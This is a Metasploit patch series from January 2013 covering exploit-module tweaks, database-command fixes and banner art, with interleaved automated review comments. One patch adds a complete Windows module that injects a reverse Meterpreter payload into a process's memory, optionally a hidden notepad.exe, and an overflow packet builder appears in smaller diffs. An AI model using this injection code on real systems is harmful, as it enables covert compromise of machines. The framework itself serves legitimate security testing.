From e78174297eb116c1d59f2492d9361f059a9e99a8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 23 Jan 2013 12:44:55 +0100 Subject: [PATCH 113/421] assuring stdapi loads on meterpreter --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 5e710b117d32..f786338546cf 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -69,6 +69,12 @@ def initialize(info = {}) ], self.class) end + + def on_new_session + + end + + def generate_jsp var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) From a3fa7cc6bc4dcb86340ef0388dc0c535b9030a4a Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 12:49:08 +0000 Subject: [PATCH 114/421] adjusted disclosure date --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index fb7dc3010cd5..1802c450bb4b 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -60,7 +60,7 @@ def initialize(info = {}) ['Movable Type 4.2x, 4.3x', {}] ], 'Privileged' => false, - 'DisclosureDate' => "Jan 08 2013", + 'DisclosureDate' => "Jan 07 2013", 'DefaultTarget' => 0)) register_options( From 1477cda3d45e17ebdce53522701019c742646ff1 Mon Sep 17 00:00:00 2001 
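Review bot: The added `on_new_session` override is empty and declares no parameter, although the commit subject says it ensures stdapi is loaded. As far as I know the framework invokes this callback with the new session object, so a zero-argument definition would raise ArgumentError when a session is created; the signature should be `def on_new_session(client)`. The body then needs the actual stdapi check, or the method should be left out until it has one, with a comment stating what the hook is for.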
From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 10:00:24 -0600 Subject: [PATCH 115/421] fix set_rhosts behavior/bugs. msf exploit(rails_xml_yaml_code_exec) > hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.0.0.105 00:0C:29:59:65:08 VMWIN2000SP4 Microsoft Windows client msf exploit(rails_xml_yaml_code_exec) > hosts -R Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 10.0.0.105 00:0C:29:59:65:08 VMWIN2000SP4 Microsoft Windows client RHOSTS => 10.0.0.105 msf exploit(rails_xml_yaml_code_exec) > exit --- lib/msf/ui/console/command_dispatcher/db.rb | 14 +++----------- 1 file changed, 3 insertions(+), 11 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 853722721370..60fe17e59243 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -205,6 +205,7 @@ def cmd_hosts(*args) mode = :search delete_count = 0 + rhosts = [] host_ranges = [] search_term = nil @@ -241,7 +242,6 @@ def cmd_hosts(*args) output = args.shift when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi @@ -280,12 +280,6 @@ def cmd_hosts(*args) range.each do |address| host = framework.db.find_or_create_host(:host => address) print_status("Time: #{host.created_at} Host: host=#{host.address}") - if set_rhosts - # only unique addresses - addr = (host.scope ? host.address + '%' + host.scope : host.address ) - rhosts << addr - end - rhosts.uniq! end end return @@ -326,7 +320,6 @@ def cmd_hosts(*args) addr = (host.scope ? host.address + '%' + host.scope : host.address ) rhosts << addr end - rhosts.uniq! if mode == :delete host.destroy delete_count += 1 
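Review bot: The scoped-address expression `addr = (host.scope ? host.address + '%' + host.scope : host.address )` that feeds `rhosts` stays copy-pasted in cmd_hosts here and, per the following patch, in cmd_services, cmd_creds and cmd_notes. Now that all four collect into `rhosts` and call `set_rhosts_from_addrs(rhosts.uniq)`, a private helper that takes a host and returns the address string would keep the formatting in one place. It would also be worth a short comment on the `-a` branch noting that `-R` has no effect there, since that branch returns before RHOSTS is set. cmd_hosts begins and ends outside these hunks.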
@@ -346,7 +339,7 @@ def cmd_hosts(*args) # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} hosts") if delete_count > 0 } ## @@ -1483,7 +1476,7 @@ def cmd_db_rebuild_cache print_error("The database is not connected") return end - + print_status("Purging and rebuilding the module cache in the background...") framework.threads.spawn("ModuleCacheRebuild", true) do framework.db.purge_all_module_details @@ -1714,4 +1707,3 @@ def each_host_range_chunk(host_ranges, &block) end end end - From b4f5c3b6eda732b89cf7b7392d5e8cab5b743d13 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 10:10:02 -0600 Subject: [PATCH 116/421] Fix up set_rhosts for all db commands --- lib/msf/ui/console/command_dispatcher/db.rb | 21 +++++++++------------ 1 file changed, 9 insertions(+), 12 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 60fe17e59243..b16fe1007bc3 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -363,10 +363,11 @@ def cmd_services(*args) default_columns = ::Mdm::Service.column_names.sort default_columns.delete_if {|v| (v[-2,2] == "id")} - host_ranges = [] - port_ranges = [] + host_ranges = [] + port_ranges = [] + rhosts = [] delete_count = 0 - search_term = nil + search_term = nil # option parsing while (arg = args.shift) @@ -417,7 +418,6 @@ def cmd_services(*args) output_file = ::File.expand_path(output_file) when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi @@ -507,7 +507,6 @@ def cmd_services(*args) addr = (host.scope ? host.address + '%' + host.scope : host.address ) rhosts << addr end - rhosts.uniq! if (mode == :delete) service.destroy 
@@ -527,7 +526,7 @@ def cmd_services(*args) # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} services") if delete_count > 0 } @@ -678,6 +677,7 @@ def cmd_creds(*args) host_ranges = [] port_ranges = [] + rhosts = [] svcs = [] search_term = nil @@ -731,7 +731,6 @@ def cmd_creds(*args) end when "-R" set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when "-u","--user" @@ -828,7 +827,6 @@ def cmd_creds(*args) addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address ) rhosts << addr end - rhosts.uniq! creds_returned += 1 end @@ -841,7 +839,7 @@ def cmd_creds(*args) print_status("Wrote services to #{output_file}") end - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status "Found #{creds_returned} credential#{creds_returned == 1 ? "" : "s"}." } end @@ -872,6 +870,7 @@ def cmd_notes(*args) set_rhosts = false host_ranges = [] + rhosts = [] search_term = nil while (arg = args.shift) @@ -895,7 +894,6 @@ def cmd_notes(*args) types = typelist.strip().split(",") when '-R','--rhosts' set_rhosts = true - rhosts = [] when '-S', '--search' search_term = /#{args.shift}/nmi when '-h','--help' @@ -955,7 +953,6 @@ def cmd_notes(*args) addr = (host.scope ? host.address + '%' + host.scope : host.address ) rhosts << addr end - rhosts.uniq! end if (note.service) name = (note.service.name ? note.service.name : "#{note.service.port}/#{note.service.proto}") 
@@ -971,7 +968,7 @@ def cmd_notes(*args) # Finally, handle the case where the user wants the resulting list # of hosts to go into RHOSTS. - set_rhosts_from_addrs(rhosts) if set_rhosts + set_rhosts_from_addrs(rhosts.uniq) if set_rhosts print_status("Deleted #{delete_count} note#{delete_count == 1 ? "" : "s"}") if delete_count > 0 } From 8bcf4a86ef5377358b0a1b14f0c259bb546d1082 Mon Sep 17 00:00:00 2001 From: booboule <booboule@gmail.com> Date: Wed, 23 Jan 2013 17:14:53 +0100 Subject: [PATCH 117/421] Update modules/exploits/multi/browser/java_jre17_method_handle.rb Wrong reference type (URL instead of OSVDB) --- modules/exploits/multi/browser/java_jre17_method_handle.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 623bc31c8e22..af8f2e1722ed 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -35,7 +35,7 @@ def initialize( info = {} ) 'References' => [ [ 'CVE', '2012-5088' ], - [ 'URL', '86352' ], + [ 'OSVDB', '86352' ], [ 'BID', '56057' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] From ff875d04e04d651efefb16f553ef931a494184a3 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 16:50:35 +0000 Subject: [PATCH 118/421] - RPATH changed to TARGETURI - both CVE numbers referenced - sightly changed exception handling --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 1802c450bb4b..77543f8d0694 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb 
+++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -37,7 +37,7 @@ def initialize(info = {}) ], 'References' => [ - #['CVE', '2012-6315'], superseded by CVE-2013-0209 (duplicate) + ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate) ['CVE', '2013-0209'], ['URL', 'http://www.sec-1.com/blog/?p=402'], ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] @@ -65,7 +65,7 @@ def initialize(info = {}) register_options( [ - OptString.new('RPATH', [true, 'The URI path of the Movable Type installation', '/mt']) + OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt']) ], self.class) end @@ -75,7 +75,7 @@ def check print_status("#{@peer} - Sending check...") begin res = http_send_raw(fingerprint) - rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout + rescue Rex::ConnectionError return end if (res) @@ -96,7 +96,7 @@ def exploit end def http_send_raw(cmd, timeout=20) - path = normalize_uri(datastore['RPATH']) + '/mt-upgrade.cgi' + path = normalize_uri(target_uri.path + '/mt-upgrade.cgi') send_request_cgi( { 'uri' => path, From c47392f5d17628e6bdf6a97c3166abfcfd7227fd Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 16:57:30 +0000 Subject: [PATCH 119/421] normalize_uri and path fix --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 77543f8d0694..43224ee2d784 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -96,7 +96,7 @@ def exploit end def http_send_raw(cmd, timeout=20) - path = normalize_uri(target_uri.path + '/mt-upgrade.cgi') + path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' send_request_cgi( { 'uri' => path, 
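Review bot: In `check`, the new `rescue Rex::ConnectionError` is followed by a bare `return`, so a connection failure makes the method return nil instead of a check code. Returning an explicit value, `return Exploit::CheckCode::Unknown`, keeps the result unambiguous for whatever consumes it. The rest of `check` lies outside the hunk, so confirm the other paths return a check code too.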
From dd0fdac73c747138fc425ec534fe124c4863afbb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 23 Jan 2013 18:19:14 +0100 Subject: [PATCH 120/421] fix indent --- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 12a79339b61f..fc01baa7b31c 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -112,8 +112,8 @@ def exploit pkt << "\x00" # reserved pkt << "\x17" # Login Object FunctionCode (23) pkt << "\x00\xa7" # SubFuncStrucLen - pkt << "\x18" # SubFunctionCode - pkt << "\x90\x90" # object type + pkt << "\x18" # SubFunctionCode + pkt << "\x90\x90" # object type pkt << "\x50" # ClientNameLen pkt << rand_text(7) jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string From ca144b9e8472404393241f621f8e7311911af9bf Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 11:40:12 -0600 Subject: [PATCH 121/421] msftidy fix --- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index fc01baa7b31c..257fdd077fb3 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -105,7 +105,7 @@ def exploit pkt << "\x00\x00\x00\x00" # request_size (filled later) pkt << "\x00\x00\x00\x01" # version (1) pkt << "\x00\x00\x00\x05" # reply buffer size - pkt << "\x22\x22" # cmd + pkt << "\x22\x22" # cmd pkt << "\x01" # sequence number pkt << res[11] # connection number pkt << "\x00" # task number 
From f50c7ea55172531588e3991716722c48c88d5283 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 11:43:39 -0600 Subject: [PATCH 122/421] A version number helps deciding which exploit to use --- modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 257fdd077fb3..36b0020b425d 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Novell eDirectory Buffer Overflow', + 'Name' => 'Novell eDirectory 8 Buffer Overflow', 'Description' => %q{ This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The vulnerability exists in the ndsd daemon, specifically in the NCP service, while From afa32c7552f62a2853af75b2485300e16657cf26 Mon Sep 17 00:00:00 2001 From: booboule <booboule@gmail.com> Date: Wed, 23 Jan 2013 20:18:24 +0100 Subject: [PATCH 123/421] Update external/source/exploits/cve-2012-5076_2/Makefile Wrong directory path --- external/source/exploits/cve-2012-5076_2/Makefile | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/cve-2012-5076_2/Makefile b/external/source/exploits/cve-2012-5076_2/Makefile index e93911b8ed42..1a84229b80a7 100755 --- a/external/source/exploits/cve-2012-5076_2/Makefile +++ b/external/source/exploits/cve-2012-5076_2/Makefile @@ -11,8 +11,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class ../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/ + mv B.class ../../../../data/exploits/cve-2012-5076_2/ clean: rm -rf *.class 
From 537e12cf1643d3e875217ad03ef962bdfac6fdc4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 13:59:34 -0600 Subject: [PATCH 124/421] Render the banners nicely --- lib/msf/ui/logos/branded-longhorn.txt | 1 - lib/msf/ui/logos/cowsay.txt | 1 - lib/msf/ui/logos/missile-command.txt | 3 ++- lib/msf/ui/logos/ninja.txt | 3 +-- lib/msf/ui/logos/null-pointer-deref.txt | 1 + 5 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/msf/ui/logos/branded-longhorn.txt b/lib/msf/ui/logos/branded-longhorn.txt index df7e2f745f43..2b49662ab41d 100644 --- a/lib/msf/ui/logos/branded-longhorn.txt +++ b/lib/msf/ui/logos/branded-longhorn.txt @@ -1,4 +1,3 @@ - , , / \ ((__---,,,---__)) diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt index 7b34488352fe..dbe42d87aca8 100644 --- a/lib/msf/ui/logos/cowsay.txt +++ b/lib/msf/ui/logos/cowsay.txt @@ -1,4 +1,3 @@ - # cowsay++ ____________ < metasploit > diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt index aedd60471100..a8a0a1d14f66 100644 --- a/lib/msf/ui/logos/missile-command.txt +++ b/lib/msf/ui/logos/missile-command.txt @@ -27,5 +27,6 @@ ################################################################################ # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # ################################################################################ - http://metasploit.pro + http://metasploit.pro %clr + diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt index 9bc984822b9f..3404d7174b4e 100644 --- a/lib/msf/ui/logos/ninja.txt +++ b/lib/msf/ui/logos/ninja.txt @@ -27,7 +27,6 @@ # # ### # # ## ######################## ## ## ## ## - - http://metasploit.pro + http://metasploit.pro %clr diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt index 9a9c1fa0bbd6..dcf58a6db4e7 100644 --- a/lib/msf/ui/logos/null-pointer-deref.txt 
+++ b/lib/msf/ui/logos/null-pointer-deref.txt @@ -36,3 +36,4 @@ Aiee, Killing Interrupt handler %redKernel panic: Attempted to kill the idle task! In swapper task - not syncing %clr + From d3549823458e143917b09c028af4ddcda36fadd0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 18 Jan 2013 22:41:44 -0600 Subject: [PATCH 125/421] Fix grammar on description for webcam --- modules/post/windows/manage/webcam.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index 6b838d04aacd..aab47587c388 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -16,8 +16,8 @@ def initialize(info={}) super(update_info(info, 'Name' => 'Windows Manage Webcam', 'Description' => %q{ - This module will allow you to these things with your target's webcam: detect, - take a snapshot. + This module will allow the user to detect installed webcams (with + the LIST action) or take a snapshot (with the SNAPSHOT) action. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -132,4 +132,5 @@ def list_webcams(show=false) return webcams end -end \ No newline at end of file +end + From e93b7ffcaf43ef5344ea24aab76ef2c11148a0f8 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 14:07:48 -0600 Subject: [PATCH 126/421] Add Carlos Perez's payload injection module See #1201 --- .../exploits/windows/local/payload_inject.rb | 127 ++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 modules/exploits/windows/local/payload_inject.rb diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb new file mode 100644 index 000000000000..73bb94aa4520 --- /dev/null +++ b/modules/exploits/windows/local/payload_inject.rb 
@@ -0,0 +1,127 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Memory Payload Injection Module', + 'Description' => %q{ + This module will inject into the memory of a process a specified windows payload. + If a payload or process is not provided one will be created by default + using a reverse x86 TCP Meterpreter Payload. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Carlos Perez <carlos_perez[at]darkoperator.com>' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Oct 12 2011" + )) + + register_options( + [ + OptInt.new('PID', + [false, 'Process Identifier to inject of process to inject payload.']) + ], self.class) + end + + # Run Method for when run command is issued + def exploit + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? 
+ + pid = datastore['PID'] + + if pid == 0 + pid = create_temp_proc() + end + + if payload.send(:pinst).arch.first =~ /64/ and client.platform =~ /x86/ + print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") + print_error("Migrate to an x64 process and try again.") + return false + else + inject_into_pid(pid,datastore['NEWPROCESS']) + end + end + + # Checks the Architeture of a Payload and PID are compatible + # Returns true if they are false if they are not + def arch_check(pid) + # get the pid arch + client.sys.process.processes.each do |p| + # Check Payload Arch + if pid == p["pid"] + print_status("Process found checking Architecture") + if payload.send(:pinst).arch.first == p['arch'] + print_good("Process is the same architecture as the payload") + return true + else + print_error("The PID #{ p['arch']} and Payload #{payload.send(:pinst).arch.first} architectures are different.") + return false + end + end + end + end + + # Creates a temp notepad.exe to inject payload in to given the payload + # Returns process PID + def create_temp_proc() + windir = client.fs.file.expand_path("%windir%") + # Select path of executable to run depending the architecture + if payload.send(:pinst).arch.first== "x86" and client.platform =~ /x86/ + cmd = "#{windir}\\System32\\notepad.exe" + elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x64/ + cmd = "#{windir}\\System32\\notepad.exe" + elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x86/ + cmd = "#{windir}\\Sysnative\\notepad.exe" + elsif payload.send(:pinst).arch.first == "x86" and client.platform =~ /x64/ + cmd = "#{windir}\\SysWOW64\\notepad.exe" + end + # run hidden + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + return proc.pid + end + + def inject_into_pid(pid,newproc) + print_status("Performing Architecture Check") + # If architecture check fails and a new process is wished to inject to one with the proper arch + # 
will be created + if arch_check(pid) + pid = create_temp_proc() if newproc + print_status("Injecting #{payload.send(:pinst).name} into process ID #{pid}") + begin + print_status("Opening process #{pid}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + print_status("Generating payload") + raw = payload.generate + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) + # Ensure memory is set for execution + host_process.memory.protect(mem) + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, raw) + host_process.thread.create(mem, 0) + print_good("Successfully injected payload in to process: #{pid}") + rescue ::Exception => e + print_error("Failed to Inject Payload to #{pid}!") + print_error(e.to_s) + end + end + end +end \ No newline at end of file From 40dcbe0e89df2bbaacab460a21edf00b2714b582 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 14:16:46 -0600 Subject: [PATCH 127/421] Fix escaping, whitespace Since banners are now just data and not code, they don't need their backslashes escaped any more. --- lib/msf/ui/logos/cow-head.txt | 4 ++-- lib/msf/ui/logos/missile-command.txt | 4 +--- lib/msf/ui/logos/null-pointer-deref.txt | 4 +--- lib/msf/ui/logos/wake-up-neo.txt | 2 +- lib/msf/ui/logos/workflow.txt | 21 ++++++++++----------- 5 files changed, 15 insertions(+), 20 deletions(-) diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt index 16ed1021d6b7..479ea81822d8 100644 --- a/lib/msf/ui/logos/cow-head.txt +++ b/lib/msf/ui/logos/cow-head.txt @@ -11,7 +11,7 @@ ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ - ( 3 C ) /|___ / Metasploit! \\ - ;@'. __*__,." \\|--- \\_____________/ + ( 3 C ) /|___ / Metasploit! \ + ;@'. __*__,." \|--- \_____________/ '(.,...."/ %clr 
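Review bot: The `rescue ::Exception => e` that closes `inject_into_pid` also traps `Interrupt` and `SystemExit`, so an operator abort is reported as a failed injection rather than stopping the module. Rescue `Rex::Post::Meterpreter::RequestError` or `::StandardError` instead. `arch_check` has no value after its `each` loop, so when the PID is not in the process list it presumably returns the enumerated list, which is truthy, and the caller carries on as if the architectures matched. Ending the method with an explicit `false` makes it fail closed. `datastore['NEWPROCESS']` is read in `exploit`, but this file registers only `PID`.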
diff --git a/lib/msf/ui/logos/missile-command.txt b/lib/msf/ui/logos/missile-command.txt index a8a0a1d14f66..5192490da219 100644 --- a/lib/msf/ui/logos/missile-command.txt +++ b/lib/msf/ui/logos/missile-command.txt @@ -27,6 +27,4 @@ ################################################################################ # %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # ################################################################################ - http://metasploit.pro -%clr - + http://metasploit.pro%clr diff --git a/lib/msf/ui/logos/null-pointer-deref.txt b/lib/msf/ui/logos/null-pointer-deref.txt index dcf58a6db4e7..38a532b541a6 100644 --- a/lib/msf/ui/logos/null-pointer-deref.txt +++ b/lib/msf/ui/logos/null-pointer-deref.txt @@ -34,6 +34,4 @@ Stack: 90909090990909090990909090 %yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr Aiee, Killing Interrupt handler %redKernel panic: Attempted to kill the idle task! -In swapper task - not syncing -%clr - +In swapper task - not syncing%clr diff --git a/lib/msf/ui/logos/wake-up-neo.txt b/lib/msf/ui/logos/wake-up-neo.txt index 2f9fd96793b0..1ee17795575e 100644 --- a/lib/msf/ui/logos/wake-up-neo.txt +++ b/lib/msf/ui/logos/wake-up-neo.txt @@ -15,7 +15,7 @@ .-;--''--.._` ` ( .' / ` , ` ' Q ' - , , `._ \\ + , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' diff --git a/lib/msf/ui/logos/workflow.txt b/lib/msf/ui/logos/workflow.txt index 1437bb8eed0f..a470eebd2418 100644 --- a/lib/msf/ui/logos/workflow.txt +++ b/lib/msf/ui/logos/workflow.txt 
@@ -2,21 +2,20 @@ %whi| METASPLOIT by Rapid7 | %whi+---------------------------+---------------------------+ %whi| %blu__________________ %whi| | - %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| - %whi| %blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| - %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| - %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| - %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| - %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| - %whi| %blu// \\\\ %whi| %grn********************* %whi| + %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======[%red*** %whi| + %whi| %blu)%yel=%blu\ %whi| %grn| %whiEXPLOIT %grn\ %whi| + %whi| %blu// \\ %whi| %grn|_____________\_______ %whi| + %whi| %blu// \\ %whi| %grn|==[%whimsf >%grn]============\ %whi| + %whi| %blu// \\ %whi| %grn|______________________\ %whi| + %whi| %blu// %whiRECON %blu\\ %whi| %grn\(@)(@)(@)(@)(@)(@)(@)/ %whi| + %whi| %blu// \\ %whi| %grn********************* %whi| %whi+---------------------------+---------------------------+ - %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| + %whi| o O o | %yel\'\/\/\/'/ %whi| %whi| o O | %yel)%whi======%yel( %whi| %whi| o | %yel.' %whiLOOT %yel'. %whi| - %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| - %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| + %whi| %red|^^^^^^^^^^^^^^|l%red___ %whi| %yel/ %grn_||__ %yel\ %whi| + %whi| %red| %whiPAYLOAD %red|%whi""\%red___, %whi| %yel/ %grn(_||_ %yel\ %whi| %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| %whi+---------------------------+---------------------------+%clr - %clr From d0382b68c71165b0c6680f039ba3200870546939 Mon Sep 17 00:00:00 2001 
